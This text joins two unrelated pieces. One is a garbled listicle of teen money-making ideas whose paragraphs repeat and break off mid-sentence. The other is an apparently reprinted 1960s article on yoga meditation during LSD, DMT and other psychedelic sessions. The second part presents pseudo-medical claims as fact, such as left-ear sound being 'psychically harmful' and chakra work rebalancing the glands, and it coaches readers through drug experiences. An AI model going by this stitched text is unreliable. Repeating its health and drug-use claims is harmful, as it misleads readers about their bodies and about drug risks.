Is there one subject you are really good at , or do you just enjoy working with young kids ?
Set up an online ( via Zoom or FaceTime ) or in person tutoring business !
During the school year , help kids in subjects like math , science and english .
If you are a great writer , help kids with their papers and projects .
If you are a theater or music lover , offer music lessons or acting coaching .
During the summer , you can help with summer reading and math packets .
If you are n’t sure how to get started , there are websites like – Is there one subject you are really good at , or do you just enjoy working with young kids ?
Set up an online ( via Zoom or FaceTime ) or in person tutoring business !
During the school year , help kids in subjects like math , science and english .
If you are a great writer , help kids with their papers and projects .
If you are a theater or music lover , offer music lessons or acting coaching .
During the summer , you can help with summer reading and math packets .
If you are n’t sure how to get started , there are websites like TakeLessons , where you can advertise your “ expertise ” after passing some background checks and evaluations .
Whether you go out on your own or use a service like TakeLessons , tutoring is a great way to make money as a teenager .
Cleanouts –
Most people have a garages , basements , attics and / or multiple closets that need to be cleaned out .
Offer a service to help folks not only clean out , but also haul away their junk .
Because one person ’s trash is another person ’s treasure , many items can be dropped off at local charity shops , which many clients will appreciate .
Anything that cannot be donated can be discarded at your local municipal dump , and most municipalities charge reduced fees to local residents .
Dump fees can be included in your overall service charge .
Helping folks declutter is a win - win for everyone !
Time via TaskRabbit – Make money doing tasks with – Make money doing tasks with TaskRabbit !
Be prepared to help people with literally any task they need help with , like cleaning , moving , lawn care , light home repairs , assembling furniture , mounting TVs , etc .
The work can be hard , but the pay can be great !
While helping with tasks is a totally legit way to make money , one drawback is that laborers must be at least 18 years old .
Get your friends and family to use Boostapal – Boostapal understands that jobs for teens are few and far between , so they provide another way for teens to earn money .
Teens become an Ambassador and get their family and friends to become “ Boosters ” and make all online purchases through Boostapal shops .
Teens earn a specific dollar amount on all qualifying purchases from over 1,500 stores .
Stores include popular favorites like Target , Walmart , macy ’s and more .
It ’s that easy !
Pet Sitting –
Do you have a way with the 4 - legged , fury kinds ?
Then a pet sitting or dog walking business would be a legit way to earn money if you are a teen .
Teens can offer dog walking and / or pet sitting services to busy individuals and earn a handsome fee for doing so .
According to –
Do you have a way with the 4 - legged , fury kinds ?
Then a pet sitting or dog walking business would be a legit way to earn money if you are a teen .
Teens can offer dog walking and / or pet sitting services to busy individuals and earn a handsome fee for doing so .
According to Angie ’s List , dog owners can expect to pay $ 15 – $ 20 for per walk that lasts 20 minutes long .
Pet sitting services are charged per day and can be as much as $ 40 per day , and $ 75 if overnight help is needed .
Start getting clients by advertising at local pet stores , online and also try introducing yourself to area veterinarians .
There are some pet sitting sites that can help match sitters with pet owners , but they require the teen to be at least 18 years old .
Play Video Games –
You read that right !
Get paid to play video games .
And we are n’t talking about winning a major Esport title .
The voyeur industry is on fire ( think – You read that right !
Get paid to play video games .
And we are n’t talking about winning a major Esport title .
The voyeur industry is on fire ( think YouTube , TikTok , Instagram Live ) , and there are tons of people out there who love to watch other people play video games .
If you are particularly good at a game , or even particularly bad , consider Twitch .
The platform allows you to charge subscribers to watch your channel where subscribers watch you play either via live stream or an uploaded recording .
Teach Video Games – Love playing but do n’t want to put yourself out there for others to watch ?
Then consider teaching other young kids and teens how to play video games .
Gamer Sensei lets esport “ pros ” to provide coaching or lessons .
You can apply to be a Sensei and once approved , you can set your own rates and times .
This is a great way for teens to earn legit money .
Social Media Influencer –
This might be easier said , than done , but it is still one way teens can earn money .
If you love putting yourself out there and do n’t mind some unfriendly comments , then becoming a social media influencer is for you !
Become an influencer by sharing your experiences , travels , opinions and general thoughts .
Platforms include –
This might be easier said , than done , but it is still one way teens can earn money .
If you love putting yourself out there and do n’t mind some unfriendly comments , then becoming a social media influencer is for you !
Become an influencer by sharing your experiences , travels , opinions and general thoughts .
Platforms include Instagram , Tik Tok and even YouTube .
Becoming a social media influencer requires a great deal of media management as well as creativity .
Influencers make money via advertising and also sponsored posts .
Sell Items on Poshmark – Most teens have a few big ticket presents in their closet from high - brow brands .
Even certain sneakers are now considered big ticket items .
Teens can sell not only their own unused or gently used items on Poshmark , but can also offer to sell items for their family and friends and then charge a commission per sale .
–
Most teens have a few big ticket presents in their closet from high - brow brands .
Even certain sneakers are now considered big ticket items .
Teens can sell not only their own unused or gently used items on Poshmark , but can also offer to sell items for their family and friends and then charge a commission per sale .
Rent out your Car –
Are you one of the lucky teens who has his own car ?
If you and your parents agree , then you can use apps like – Are you one of the lucky teens who has his own car ?
If you and your parents agree , then you can use apps like Turo or Sixt to advertise your car as a private car rental .
The make and model of your car will determine the rate you can receive .
Turo provides an estimate for the rate you can expect to receive per rental , as well as an estimate for your annual potential earnings .
Dinner Delivery –
Old enough to drive and looking for a legit way to make money ?
Then consider on - demand meal delivery services like – Old enough to drive and looking for a legit way to make money ?
Then consider on - demand meal delivery services like Uber Eats DoorDash , etc .
You set your own hours and can decide which days you want to work .
With the current limitations with indoor dining , on - demand food delivery services are in high demand .
And if you do n’t have an interest working for a formal delivery service like Uber Eats or DoorDash , many local restaurants are improvising and offering delivery , so food delivery jobs are fairly easy to come by .
Scan your Groceries – National Consumer Panel states that it is a great way to earn “ points for gift cards , merchandise and more ” just by scanning food items you are buying anyway .
The service provides desired feedback to the grocery industry as to what products are being bought , the frequency and location .
Participants use a barcode reader to scan all purchased food items like groceries and even take out and market items .
As a teen , it should n’t take you long at all to scan the items and earn rewards and does n’t cost you anything but time .
And you can expect to earn more if you include family and neighbors ’ groceries and food products .
Transcription Work –
If you have good typing skills and a good ear , then you can transcribe audio files .
Sites like –
If you have good typing skills and a good ear , then you can transcribe audio files .
Sites like TranscribeMe have a growing network of people who work from home transcribing various audio files .
And TranscribeMe claims to pay the highest rates in the industry with no shortage of work .
Ironing –
While you might not know what ironing actually is , it remains a necessary evil in most households .
As families become increasingly busy , there are many chores that keep getting pushed to the bottom of the to do list , and this is where a motivated teen comes in to help !
Help with some day - to - day mundane , but important chores like laundry and ironing .
You can charge per the load plus per piece of clothing that needs to be ironed .
Start by offering the service to your friends ’ parents and neighbors , or advertise on community FB pages .
Word of mouth will spread quickly and we are sure you will be pressed for your help !
Take Surveys – Qmee pays you for your opinions .
Install the – Qmee pays you for your opinions .
Install the Qmee app on your browser and mobile phones and then take surveys and / or watch advertisements and earn money .
It is as easy as it sounds and is honestly a legit way for teens to earn money .
Teach Conversational English –
You do n’t need to be a grammarian to help non-native English speakers learn conversational English .
You can become a personal English coach on sites like – You do n’t need to be a grammarian to help non-native English speakers learn conversational English .
You can become a personal English coach on sites like Samespeak and help others around the world .
All lessons are virtual via video calls , and Samespeak provides lesson plans and a course syllabus .
Rates are about $ 10 per 30 minute lesson , so it is a great way for a teen to earn some extra money .
Lifeguarding –
If you love to swim and being out in the sun , then consider becoming a lifeguard .
Check the Red Cross for lifeguard certification courses near you .
Community pools , swim clubs , country clubs and even some YMCAs are always in need of junior lifeguards especially during the summer when demand is high and pool hours are long .
Landscaping – Another chore that busy adults hate to spend their spare time doing is mowing their lawn , planting , pruning and weeding .
You can start a mini landscaping business and offer a small number of specific services .
Get a couple friends to help and you can share the work and finish a house in no time .
Hand out flyers in your neighborhood , advertising on local FB groups and post flyers around your community .
Become a Crowdworker – Amazon ’s Mechanical Turk ( known as MTurk ) is a market place where businesses can hire remote workers to do tasks that can not be done by computers .
There are thousands of tasks posted , like tagging items in an image , identify objects seen in satellite images , identify duplicate listings in catalogs , content writing , and more .
And the best part of MTurk is teens only have to be 14 years old to join !
You decide which tasks you want to apply for and you decide when and how often to apply .
MTurk is not only a legit way to earn money , but also an easy one , too !
Listen to Customer Service Calls –
When your parents make any customer service calls , the calls always start with the disclaimer that “ calls may be recorded for quality assurance and training purposes . ”
So who actually listens to those calls ?
Well you can !
–
When your parents make any customer service calls , the calls always start with the disclaimer that “ calls may be recorded for quality assurance and training purposes . ”
So who actually listens to those calls ?
Well you can !
Humanatic provides a service of reviewing calls and customer feedback for various companies , and the only thing you need to join the Humanatic is a valid PayPal account .
It is a super easy way to earn some extra money while working from home and on your own schedule , even as a teen .
Sell Virtual Items –
Ever need to buy an extra life or a specific tool while playing a video game ?
Selling items for these in - game purchases is a way to make legit money .
Second Life is a virtual marketplace that allows you to sell digital items and get paid to do so .
Here is a quick start guide for Second Life .
Reselling Sneakers – Sneakers are a hot commodity .
New sneaker styles are released and often sell out in minutes .
And many vintage styles are also in high demand and pairs in good condition can be sold for a nice profit .
There are tons of sneaker communities that provide information on upcoming releases and resale ideas .
Top resellers can make 5 figures a month and there is still plenty of room for other teenagers to still make legit money .
Be a Camp Counselor – Most communities have tons of summer camps that always need seasonal employment .
Or maybe you went to a day or overnight camp and have aged out and are ready to be a CIT ( counselor in training ) or a full counselor .
Camps love to hire teenagers because they often work great with kids , and many have been to camp and know what it is like .
Check out local job boards or a website like CCUSA for available camp counselor jobs .
Working at a summer camp is not only a legit way to make money , but it is also a lot of fun .
Sell Old Electronics –
Did we already mention that one man ’s trash is another man ’s treasure ?
Maybe you have an older iPhone or iPad lying around , a box of DVDs in the attic , or a handheld game system you no longer use — these older electronics are definitely worth something !
Use sites like – Did we already mention that one man ’s trash is another man ’s treasure ?
Maybe you have an older iPhone or iPad lying around , a box of DVDs in the attic , or a handheld game system you no longer use — these older electronics are definitely worth something !
Use sites like eBay Mercari or Decluttr to check the market and reasonable prices , and also to sell your items online .
If you use a site like Craigslist , please make sure to not use your personal phone number or meet any place other than in front of a local police station .
Sell Old Books –
Have you ever heard of a site called – Have you ever heard of a site called Half.com ?
Well that site was started as a way to sell old college textbooks when online selling was just taking off .
Now that site is part of eBay and the founder is a top Venture Capitalist .
That sort of rocket trajectory might not be the path for all teenagers starting a business , but we are sure you all have quite a few old books lying around ( both old and newish ! ) .
Selling old books is a great way for teenagers to make legit money , and apps like BookScouter make it easy to do so !
Test Websites – Companies often need average users to test newly launched websites .
These tests might include commenting on ease of use of the site , design feedback , recording any glitches , etc .
You do n’t have to be an expert in website design or a professional developer .
Usually companies are looking for every day users to test and provide feedback .
Sign up on a site like usertesting .com and earn $ 10 for every 20 minute test completed .
Watch Movie Previews –
This is another great job that teenagers can do at home , whenever they want .
Watch prospective movie previews and give feedback for money .
Sites like Market Force and –
This is another great job that teenagers can do at home , whenever they want .
Watch prospective movie previews and give feedback for money .
Sites like Market Force and Swagbucks provide opportunities for customers to watch trailers and take surveys , and get paid to do so .
Rep Household Products – Multilevel marketing has a bad name , but there are plenty of direct sales companies in which you can invest a small amount and sell their products , without getting caught in a multilevel circle .
– Multilevel marketing has a bad name , but there are plenty of direct sales companies in which you can invest a small amount and sell their products , without getting caught in a multilevel circle .
Avon and BeachBody are just a couple of very successful direct sales companies that provide legit ways for teenagers to earn money .
It is best to choose something that is of interest to you , and that you might even use yourself .
And also do some research and make sure the company is a direct sales and not a multi - level marketing company .
Once you start selling , tap your friends and family first and then word of mouth and social media will help grow your business .
Manage Social Media for Companies –
For most teens , using social media is second nature , like walking and eating .
But for many business owners , it is a real chore to keep their social media accounts current and relevant , not to mention it is n’t part of their core business , no matter how important it might be .
Consider offering your services to manage social media accounts for businesses .
Advertise on FB and hand out flyers to local small businesses .
Guarantee there will be more than one small business owner who will jump on the opportunity to have you take over managing their social media accounts .
Monetize your Blog –
Have you been writing a blog or interested in starting one ?
Like popular social media accounts , blogs can be monetized to earn money .
The two main ways to monetize blogs are by using – Have you been writing a blog or interested in starting one ?
Like popular social media accounts , blogs can be monetized to earn money .
The two main ways to monetize blogs are by using Google Adsense and also through affiliate links .
Both are legit ways to earn money , and do n’t take any more time or effort than what you would normally be doing on your blog .
Gig Jobs –
There is a new emerging market for gig workers , officially defined as , “ independent contractors , online platform workers , contract firm workers , on - call workers and temporary workers . ”
So of course , there are sites where companies and gig workers can be matched up .
–
There is a new emerging market for gig workers , officially defined as , “ independent contractors , online platform workers , contract firm workers , on - call workers and temporary workers . ”
So of course , there are sites where companies and gig workers can be matched up .
Instawork is a major player in the gig economy and allows companies and gig workers to connect .
You will be able to pick and choose which type of gig job you are interested in , and will have flexibility over when the work is performed .
Pay rate , due dates , gig duration and other job information is all available before you match to any potential gig .
Give your Opinion and / or Review – Kind of like the movie trailers and website testing , there are a host of other products for which companies need customer opinions .
Thing music , fashion , product experiences , secret shopping , etc .
Some work is online through sites like Reckner , Market Force and Slice the Pie .
And then other jobs are in the field , like being a mystery shopper .
Never , ever pay to participate in an opinion or secret shopping job !
No legitimate customer experience marketing company will ever require participants to pay anything , especially a membership or participation fee .
Remember , the idea is to find a legit way for you to make money as a teenager .
Take Surveys –
This has to be one of the easiest legit ways for a teenage to make money .
Answering surveys online can pay up to $ 50 / survey , but be ware of scams which run aplenty .
Many of the same companies that pay for opinions and reviews also pay for surveys .
Check out Reckner , Market Force and Swagbucks .
Again , the most important aspect of this job is to find a real company that will pay you to take surveys online .
Invest your Money –
Do you have some birthday money that you have saved up over the years ?
Consider taking some of it and investing in the stock market .
Investing money in the stock market is not for the faint of heart , and most financial advisors say young investors should aim to invest for the long term .
Historically , investing in the stock market took large sums of money , but now there are many ways for investors even with small amounts of money to participate .
Sites like –
Do you have some birthday money that you have saved up over the years ?
Consider taking some of it and investing in the stock market .
Investing money in the stock market is not for the faint of heart , and most financial advisors say young investors should aim to invest for the long term .
Historically , investing in the stock market took large sums of money , but now there are many ways for investors even with small amounts of money to participate .
Sites like Robinhood have fractional shares in many stocks .
And other sites like e*trade and TD Ameritrade are great for beginners and require small minimums to get started .
Online Customer Service –
There are so many companies that now hire at - home customer service representatives , but U - Haul has a particularly teen - friendly program .
Job responsibilities include answering calls , monitoring customer experience , and more .
Freelance Writing –
If you have a way with words and an eye for grammatical details , then becoming a freelance writer could be for you .
A freelance writing business is a great way for a teenager to make legit money , and can also build a pretty good portfolio for college and job applications .
You can find basic writing gigs on sites like –
If you have a way with words and an eye for grammatical details , then becoming a freelance writer could be for you .
A freelance writing business is a great way for a teenager to make legit money , and can also build a pretty good portfolio for college and job applications .
You can find basic writing gigs on sites like Fiverr and Upwork , or you can start a blog and post all of your portfolio .
You can then use social media to advertise your blog and freelance writing services .
Bake Sales –
You do n’t have to love to bake to have bake sales .
If you have friends and family who love to bake , offer to sell their baked goods and split the proceeds .
There are many people who like to serve homemade goods , but do n’t have the time or skills to bake anything .
Organize local bake sales in different places in the community like charity events ( may require you to donate a portion of the proceeds to the charity ) , or advertise on social media to sell baked goods for special occasions ( cookies for graduations , cakes for birthdays , etc. ) .
Ask for referral and for clients to post pictures on their own social media — word of mouth is a great way to grow your baked sales business .
Sell Stock Photos – Making money taking pictures does n’t mean you have to be a famous photographer or even that you have tons of expensive camera equipment .
Good quality , stock photos are in high demand for online magazine articles , blogs and more .
And almost every teen has a cell phone in his pocket , and with the advances in the cell phone camera technology it is super easy for teens to take great pictures and then post them for sale on stock photo platforms such as – Making money taking pictures does n’t mean you have to be a famous photographer or even that you have tons of expensive camera equipment .
Good quality , stock photos are in high demand for online magazine articles , blogs and more .
And almost every teen has a cell phone in his pocket , and with the advances in the cell phone camera technology it is super easy for teens to take great pictures and then post them for sale on stock photo platforms such as iStock Shutterstock , Adobe Stock and more .
Selling stock images is a legit way to make money as a teenager .
Become a Mystery Shopper – Similar to completing surveys , writing reviews or providing your opinions , you can make money by becoming a mystery shopper .
A mystery shopper is hired by retail companies to go into one of their stores and then report back on their entire experience , including the condition of the store , the customer service you received from staff and how you felt shopping in the store .
As with some other jobs on the list , there are many illegitimate companies trying to scam potential shoppers so make sure to watch for warning signs like being asked to pay to see jobs .
You can also make sure that the companies are MSPA members .
Sign up for legit mystery shopping jobs at sites like Market Force and Best Mark .
Refereeing – Most local sports leagues need referees .
Even townships have youth recreational leagues for which they need referees .
As teenagers as young as 15 , you can go through the process to become license refs in a variety of sports .
Check state referee sites like the U.S. Soccer Federation Referee Program to find a local program in a sport that interests you .
Become a Personal Assistant –
Do you like to organize your closet in your spare time , or appreciate the details ?
Then being a personal assistant may be for you .
As life becomes busier and busier , many households are in need of a personal assistant to help with day - to - day task such as buying groceries , updating calendars , running errands , opening mail , etc .
Advertise in your community or offer your services to ay friends or family .
As your business grows and you make more money , you can even hire some friends !
Teach a Foreign Language –
If you grew up in a multi-lingual home or are in an advanced level of a foreign language , consider teaching a foreign language .
Websites like –
If you grew up in a multi-lingual home or are in an advanced level of a foreign language , consider teaching a foreign language .
Websites like Verbalplanet match tutors to students .
Lessons are conducted virtually and you set your own schedule .
Tutors can earn up to $ 30 / hour .
Resell your Wardrobe – Always looking for the latest trends and need some money to keep up ?
Consider reselling your gently used clothing items on sites like – Always looking for the latest trends and need some money to keep up ?
Consider reselling your gently used clothing items on sites like ThredUp and Poshmark .
These online consignment sites accept items from thousands of brands and generally must be less than 5 years old .
There is very little you have to do to make money this way , and you can also take a small commission for selling clothes for your friends and family .
Online Freelance Work – Similarly to freelance writing , if you have some other niche skills like graphic design or coding , using Fiverr and Upwork to get online freelance jobs .
You set your schedule and fee , and can work any where .
Freelance work is is a great legit way to make money as a teenager .
Review Songs –
Most teenagers already love music and listen to quite a bit of it , so why not get paid to do so !
Music XRay is a super cool platform that pays listeners for their opinion on new songs to which they get special access .
Rates are about $ 0.10 per song and you will be asked for your feedback on lyrics , your thoughts about the artist , and more .
Song bits are about 30 seconds long , so it wo n’t take a lot of time and you can listen any where , even on the go .
Sound Current Meditation
Meditation on the Light in the Head
Meditation on the Chakras
The Combination of Mantra Yoga and Meditation
Meditation on the I Am Principle
San Francisco Oracle # 8 The fact that psychedelic drugs induce a greater sensitivity to subtle spiritual and psychic energies , and speed up the influx of impressions from deeper levels of consciousness , raises the immediate question of how these energies can be properly understood and handled .
Obviously , if these energies are not guided , they can do more harm than good .
The application of traditional Yoga meditation techniques while under psychedelic experiences , provides a constructive solution to this problem .
According to Yoga philosophy , the most spiritual and powerful aspect of man 's nature is the faculty of attention or consciousness .
The most fundamental aspect of man's free will is the choice as to what he allows his attention to dwell upon .
The attention always has to be on something , but we can choose what we allow it to dwell upon .
The goal of all Yoga practices is to discover and directly experience what the attention or faculty of consciousness in man is .
The yogi seeks to know that principle by which all else is known .
This goal is achieved by observing the observer or placing the attention on the attention itself .
This may at first seem very abstract and hard to grasp in terms of practical application , but there are workable , time - proven methods for achieving this state of pure consciousness which when consistently applied and practiced are bound to yield results .
It should be constantly remembered during a psychedelic session that whatever perceptions , thoughts and even hallucinations occur , they are all the creations of one 's own mind and consciousness , and are filtered through one 's own instrument of perception .
These perceptions are patternings of our own psychic energy .
We give energy to whatever thoughts and feelings we allow the attention to dwell upon .
Wherever the power of attention is focused , it generates mental and emotional energy in the form of its own lower overtones , thus feeding and energizing the thoughts and emotions which the attention dwells upon .
It becomes clear that the key to remaining in control of a psychedelic experience is in controlling the flow of attention .
Distractive experiences can be avoided in the first place , and the flow of attention can be properly directed by the use of Raja Yoga techniques of meditation .
The following is a description of several such techniques which can all be applied while under the influence of LSD , marijuana , mescaline , DMT , hashish , psilocybin or other consciousness - expanding drugs .
At this point , let us consider a basic rule to apply in case of paranoia or other unpleasant or frightening experiences while under the influence of a psychedelic drug .
Realize that whatever you may be thinking , feeling or experiencing is being experienced by the consciousness within you .
Then place your undivided attention on that consciousness which is experiencing whatever is happening to you .
This process returns your consciousness to its own pure nature and disengages mental and astral thought forms .
These destructive thought forms then dissipate and are dissolved back into the homogeneous , vibrational energy of the plane of energy substance from which they were originally molded .
The strong light released by consciousness observing itself , helps to quickly dissolve and dissipate destructive thought forms .
This happens because the strong lower overtones of pure consciousness which are generated , cancel out the discordant , out of phase vibrations of destructive thought forms .
If the attention wanders while practicing any of these meditation techniques , immediately bring the attention back to the process of meditation , and do this as many times as is necessary until the attention remains centered on the particular form of meditation which you are practicing .
Inexperienced meditators have a tendency to fight distractions , which in itself , becomes a distraction .
The attention can only dwell on one thing at a time .
Simply bring it back to the thing you are meditating on .
Another way of stopping distractions is simply to temporarily suspend the breathing process by neither breathing in or out .
Since breathing is intimately tied to every biological process in the body , the instinct to survive ( developed over billions of years of evolution ) will interrupt the flow of attention into distractions and bring it to center on the awareness of the cessation of breathing .
It is then an easy matter to resume normal breathing and to center the attention on the particular form of meditation being practiced .
Focus your full , undivided attention in the center of your brain where the pineal gland is located .
Listen with your attention for whatever sounds present themselves .
After awhile , you will hear sounds of various tones and pitches .
At first , you may only hear the low hiss of random molecular noise in the ears , but in time , definite tones will present themselves like sustained notes on an organ .
This sound is perceived directly by the brain and the subtle bodies themselves , and not through the outer physical organs of the ears .
It is the sound of the vibration of conscious energy as it flows through the physical body and as it vibrates and circulates within the subtle bodies .
You should focus your entire undivided attention on the sound of highest pitch that you can hear , and let it draw you up into higher and higher states of consciousness ; also let the sound reveal and intensify the spiritual light .
The better your concentration is , the louder and more distinct the sound will become .
Experience the vibration of this sound expanding until it includes your whole head , your whole body , and ever - expanding volumes of space surrounding you .
By this means , you will tune into the music of the spheres , and your whole being will become a receiver and transmitter of the harmonious rhythm of the universe .
When you open your eyes after such a meditation , you may find your surroundings filled with blazing light .
In the beginning , the sound current may appear in one localized part of the head ; most likely in one of the ears .
You should not listen to the sound current in the left ear because this is psychically harmful .
Listen to it in the right ear , and gradually try to move it to the center and top of the brain .
From this vertex center , known as the Sahasraram Chakra ( whose associated gland is the pineal body ) , allow the vibration of the sound current to fill the entire head and to then expand beyond the head into the surrounding space .
This is one of the classical methods and can lead to the highest type of experience .
To practice this form of meditation , close your eyes , and observe your inner field of vision by focusing the attention at the point in the center of the forehead , just slightly above the point between the eyebrows .
This location is called the Third Eye Center or Agna Chakra .
It is related to the faculty of clairvoyant vision .
The physical manifestation or anchorage point for the Agna Chakra is the pituitary gland , which is located in a bony cradle in back of the root of the nose .
When you close your eyes , look steadily into your inner field of vision until light , color and patterns begin to appear .
( This is looking with your attention and not with the physical eyes which should remain relaxed . )
When most people close their eyes , initially they see a black void , but by looking steadily into this void , various colors and patterns will begin to appear .
When this happens , simply observe them with your full , undivided attention as if you were intently watching a movie .
Then periodically focus all of your attention within the smallest point that you can see in the center of your field of vision , and pierce through that point .
After you have done this , the light will again blaze forth from the point in a new burst of energy , and you will find yourself at a higher rate of vibration or plane of energy .
With continued practice of this form of meditation , you will become immersed in a blazing sea of light ; and you will become a center from which that spiritual power is radiated .
By concentrating the attention in the Sahasraram Chakra or Thousand - Petalled Lotus , located at the top of the head , an experienced meditator can release an even more powerful radiation of light and spiritual energy .
( It may take more work to activate this chakra ; the beginner can get more immediate results by looking through the Agna Chakra or Third Eye Center . )
The Sahasraram
Wheel is the highest chakra ; called the " Doorway to the Infinite " and the Brahmarandra or Hole of Brahma , it is the most powerful and spiritual of all the centers that can be awakened in man ( with the possible exception of the Heart Chakra which is considered by some yogis to be of equal importance ) .
When the Sahasraram Chakra is fully activated in a perfected yogin or saint , the white fire of Cosmic Kundalini descends upon him and blends with his own rising kundalini force , and the white light of spirituality radiates for miles around .
By focusing the attention on various locations within the body , where the chakras are located , it is possible to activate these chakras and facilitate an increased flow of energy between the higher planes of energy and the subtle body , thus releasing an increased amount of spiritual energy .
There are seven major chakras in the body which link together the physical body and the subtle energy bodies .
The chakras are revolving vortexes of energy which act as mechanisms for the absorption and radiation of spiritual energy .
In the physical body , they relate to glands and major nerve centers .
In the etheric body , they are like wheels with flower petals which are created by a sort of stroboscopic effect of the revolving energy .
The etheric chakra flowers are connected by a sort of funnel - like stem to the gland or nerve plexus to which they belong .
In the astral body , the chakras appear as whirlpools of energy , like the eddies in a stream of water or in a basin of water when the stopper is pulled out .
In the mental body , they appear as converging lines of light .
The Muladora Chakra is at the base of the spine and is the seat of the Kundalini Fire Wheel when aroused , which in the advanced stages of yoga , rises up through the center of the spine and activates the highest chakra in the cerebral cortex called the Sahasraram Chakra .
The next chakra is called the Sacral Center or the Swadisthana Chakra .
It relates to the adrenal glands and is related to the absorption of pranic vitality , which is in the air .
The air absorbs this energy from solar radiation .
There seems to be some differences of opinion between various texts as to whether the Muladora Chakra or Swadisthana Chakra relates most directly to the sexual functions .
After the Swadisthana Chakra , comes the Manipara or Solar Plexus Center which relates to the digestive functions and vitality of the astral desires and feeling emotions .
Next in ascending order is the Anahala or Heart Chakra , which relates to the source of spiritual energy and the higher emotions of love , altruism and benevolence .
The next chakra is the Vishudha or Throat Chakra , which is related to the thyroid gland and has to do with the power of speech and relates to mantra yoga and the capacity for artistic creativity .
This center is activated by chanting and singing .
Next we have the Agna Chakra , which is located on the forehead , just slightly above and between the eyebrows .
It is related to the pituitary gland and the subcortical areas of the brain .
The Agna Chakra has to do with the higher mind faculties of clairvoyance , scientific reasoning , willing and philosophical thought .
Development of the chakra awakens the ability to see and regulate astral and mental forces on the superphysical level .
Above the Agna is the Sahasraram Chakra or Thousand - Petalled Lotus , which is related to the pineal gland and the cerebral cortex .
It 's located at the top of the head .
It relates to the sound current and the faculty of clairvoyant hearing , and is the most spiritual of all the chakras .
When this chakra is fully developed , union with God-consciousness is possible , and Illumination takes place .
By focusing the attention in any one of the chakras , the lower overtones of the concentration of consciousness in that location activates that chakra and increases the energy flow in it , making possible a conscious entry into the superphysical planes of energy .
Meditation on the first three chakras , namely the Muladora Chakra , the Sacral Chakra and the Solar Plexus Chakra is not recommended because this can arouse lower emotions and sexual passions .
This can allow entry to undesirable astral influences and cause psychological unbalance .
It is better to work with the Heart Center , the Agna Chakra , and the Sahasraram Chakra because these are the most directly related to the unfoldment of superconsciousness ; and when awakened , will automatically develop the lower chakras by changing the glandular balance of the body and by circulating new pranic forces through the energy channels or nodies of the etheric body as well as purifying and strengthening the astral and mental bodies .
The hormones which the pituitary gland secretes , regulates the other glands in the body including the thymus gland , the thyroid gland , the adrenal gland and the sex glands as well as other glands .
Once the pituitary gland is fully activated by the development of the Agna Chakra , all other glands are brought into proper chemical balance , thus helping to properly develop and raise the vibratory rate of all the lower chakras .
In Kundalini Yoga , an advanced yoga practice , concentration is done on the Muladora Chakra at the base of the spine in order to arouse the Kundalini Fire and bring it through the center of the spine to activate the highest chakra , the Sahasraram , at the top of the head .
If however , the Kundalini Fire is prematurely aroused and not properly directed , great damage can be done to the nervous system and to the etheric body .
If the Kundalini force is not properly directed upwards , it can revert downward causing abnormal sexual desire and perversion .
Therefore , arousing the Kundalini should only be done in advanced stages of yoga when a great deal of purification of the subtle bodies has taken place and soul control over the personality is well established .
When doing
Om chanting or other mantras , it is possible to activate various chakras .
By chanting at varying pitches , you will make different tissues in the body vibrate , thus stimulating the nerve centers and the glandular centers , and activating the chakras associated with them .
With a bit of experimentation , you will find which tones or pitches vibrate which parts of the body and which chakras .
When this has been ascertained , then chant with full force while meditating in the chakra you wish to activate .
The sound waves create vibration patterns in the etheric , astral and mental atmosphere , which you can develop the ability to see .
They are multicolored and very intricate and beautiful , sometimes forming geometrical patterns and mandalas made out of threads of light .
Music will have a similar effect .
Just listen to the music during a psychedelic session while observing the inner light through the Agna Chakra or Third Eye Center .
Then watch the color patterns change and develop with the music .
Classical music and Indian ragas are especially good for this purpose .
In the practice of this form of meditation , consciousness is made to dwell upon itself .
When properly and successfully practiced , this is the most powerful and highest form of meditation .
While focusing in the Heart Chakra or in the Sahasraram Chakra at the crown of the head , place the attention on the attention itself .
If any distractions come in the form of thoughts and perceptions of a specific nature , then immediately concentrate your attention upon that consciousness in you which is the experiencer of those thoughts and perceptions .
Even the manifestation of spiritual light and sound current should be regarded in this way .
The sound current and the light are merely the lower overtone manifestations of the pure consciousness upon which you are meditating .
The more you hold your attention steady in concentration upon itself , the more the light , sound current , electrical sensations in the body , feelings of magnetic force , sensations of weightlessness , etc. will manifest automatically .
If , however , you allow your attention to become distracted by any of these manifestations , then you will be subject to the limitations of the thing by which you have been distracted ; and the focusing of pure consciousness will be interrupted so that all of the things which are the lower overtones and by - products of the focusing of pure consciousness , possibly including the psychic manifestation which distracted your attention , will also stop .
Seek ye first the kingdom of pure consciousness and all of these other psychic manifestations will be added unto you .
Placing the attention on the attention itself can be done in any location in space since pure consciousness , which is the same as God , is an omnipresent principle .
In the beginning , it will be found easiest to do this in one of the chakras , preferably the Heart Chakra or the Sahasraram or Head Center .
The Agna Chakra or Third Eye Center located on the brow , can also be used with good results , but it is better to use the Sahasraram Chakra if you can activate it .
With practice of this form of meditation , your pure consciousness will experience itself as a blazing sea of white light extending infinitely in every direction .
The pure consciousness itself is crystalline and colorless , but it generates the white light which is the simultaneous presence of all of the colors which are the specific lower overtone rates of vibration , which the pure consciousness generates .
The placing of the attention on the attention itself in a specific chakra , brings about a condition in that chakra , in which its vibration structure is harmonically and geometrically aligned in all of its planes of manifestation or rates of vibration .
This creates common node points in the inner plane structure of the chakra .
Vibrations of different frequencies and different wavelengths all begin and end together at these common node points .
This is made possible by the fact that the wavelengths of the various vibrations and their frequencies all bear exact mathematical rates to each other , like the notes in a musical scale .
Any vibrations which are out of phase in terms of their spatial distribution or vibratory rates are automatically canceled out by interfering with other waves at the common node points .
Where several wavelengths , both short and long , begin and end their cycles together , it is possible to slip through the dimensions and to experience the higher spiritual rates of vibration and approach the Atman , which moves with infinite speed .
At these common node points , the exchange of energy from one octave or plane to another , also becomes possible , allowing a flow of energy from the higher dimensions into the lower dimensions .
Thus , a transmutation of those vibration patterns which exist on the lower dimensions into the higher ones becomes possible .
The soul is then able to control the personality structure , making it a fit instrument of spiritual expression in the affairs of men .
This form of meditation develops one - pointed concentration .
Since the use of psychedelic drugs stimulates the flow of a great amount of energy from higher planes into the lower planes , any thought and emotion patterns created during a psychedelic session are strongly imprinted and have a great deal of energy incorporated into their vibration structure .
These thought and emotional patterns then act as powerful unconscious conditioning factors in our daily lives .
It is therefore of the utmost importance that constructive imprints are made during a psychedelic session .
Remaining in control of the attention can ensure this .
In this regard , I would like to give a few final points of advice .
Try not to focus the attention from one thing to another too quickly .
Stay with a thought or meditation process until it is complete .
Do n't panic if frightening visions or hallucinations occur .
Fear will make you concentrate on them all the more and thus feed them with the power of your attention .
Remain detached and place your attention on that consciousness within you which is experiencing the hallucinations .
